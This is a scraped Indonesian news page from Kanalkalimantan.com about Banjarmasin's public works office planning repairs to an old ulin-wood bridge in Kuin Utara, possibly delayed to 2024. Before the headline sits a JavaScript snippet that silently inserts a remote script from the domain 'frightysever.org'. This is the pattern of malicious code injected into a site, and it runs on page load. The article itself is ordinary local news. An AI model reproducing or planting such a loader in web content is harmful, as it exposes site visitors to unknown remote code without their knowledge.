(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Jembatan Ulin di Kuin Utara Diperbaiki Tahun Ini, Bisa Molor ke 2024


KANALKALIMANTAN.COM, BANJARMASIN – Jembatan ulin tua di jalan Kuin Utara RT 04, Kelurahan Kuin Utara, Kecamatan Banjarmasin Utara, Kota Banjarmasin, menjadi salah satu prioritas perhatian dari Pemerintah Kota Banjarmasin.

Dinas PUPR Kota Banjarmasin melalui Sub Kordinator Jembatan Bidang Jembatan dan Jalan, Ir Damayanti mengatakan, jembatan yang sudah berusia tua tersebut dikatakan sudah dimasukan dalam rencana perbaikan pada tahun anggaran 2023.

“Sudah kita masukan di perencanaan tahun ini, dalam tahap permintaan penambahan anggaran di APBD 2023,” katanya saat ditemui di kantor Dinas PUPR Banjarmasin, Selasa (8/8/2023) siang.

Baca juga: Tahanan Lapas Karang Intan Tewas Ditikam, Benda Tajam Lolos Masuk Kamar Sel

Akan tetapi, pihaknya masih belum bisa memastikan pengerjaan perbaikan jembatan dapat dilakukan pada tahun 2023 atau molor ke 2024.

“Pengajuan sudah, kita usahakan 2023 kalau memang disetujui,” ungkapnya.

Terkait besaran anggaran yang akan dikeluarkan, Damayanti membeberkan angka berada di bawah Rp1 miliar, sebab desain jembatan tetap seperti sebelumnya.

“Anggarannya di bawah satu miliar,” bebernya.

Baca juga: Truk BPBD Banjar Turun Tangan, 4 Tanki Air Bersih Dipasok ke Kertak Hanyar

PUPR Banjarmasin mengaku sudah pernah beberapa kali melakukan pemeliharaan terhadap jembatan yulin di Kuin Utara itu, terutama untuk penguatan lantai jembatan.

Sebelumnya diberitakan jembatan terbuat dari kayu ulin dekat Masjid Sultan Suriansyah banyak dikeluhkan masyarakat, sebab lantai dan pagar jembatan sudah banyak yang lepas.

Suara berisik jembatan selalu keluar ketika dilewati pengendara motor dikarenakan gesekan antara pengunci jembatan dari plat besi ada yang copot atau tidak kuat.

Baca juga: 124 Bacaleg DPRD Kalsel Tidak Memenuhi Syarat 

Bahkan dari kesaksian sejumlah warga, di jembatan tersebut sering terjadi insiden pengendara motor yang jatuh. (Kanalkalimantan.com/rizki)

Reporter : rizki
Editor : bie


Risa

Recent Posts

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

7 jam ago

Bappedalitbang Banjar Gelar Rapat Pembahasan Data Indikator Makro Pembangunan RPJPD

KANALKALIMANTAN.COM, MARTAPURA – Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar melaksanakan rapat Pembahasan… Read More

7 jam ago

Pergantian Perwira di Polres Banjarmasin, Ini Nama dan Jabatannya

KANALKALIMANTAN.COM, BANJARMASIN - Sejumlah perwira menengah (Pamen) dan perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

8 jam ago

O2SN dan FLS2N 2024 SD MI Tingkat Kabupaten Kapuas Digelar

KANALKALIMANTAN.COM, KUALA KAPUAS - Ratusan pelajar tingkat SD/MI di Kabupaten Kapuas antusias mengikuti upacara pembukaan… Read More

8 jam ago

Bangun Posyandu di Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pembangunan Pos Pelayanan Terpadu (Posyandu) tak luput dari sasaran Satgas TNI Manunggal… Read More

8 jam ago

Kelurahan Guntung Manggis Membidik Juara Kampung Keluarga Berkualitas Nasional

KANALKALIMANTAN.COM, BANJARBARU - Kampung Keluarga Berkualitas (KB) di Kelurahan Guntung Manggis menerima kunjungan Tim Penilai… Read More

8 jam ago

This website uses cookies.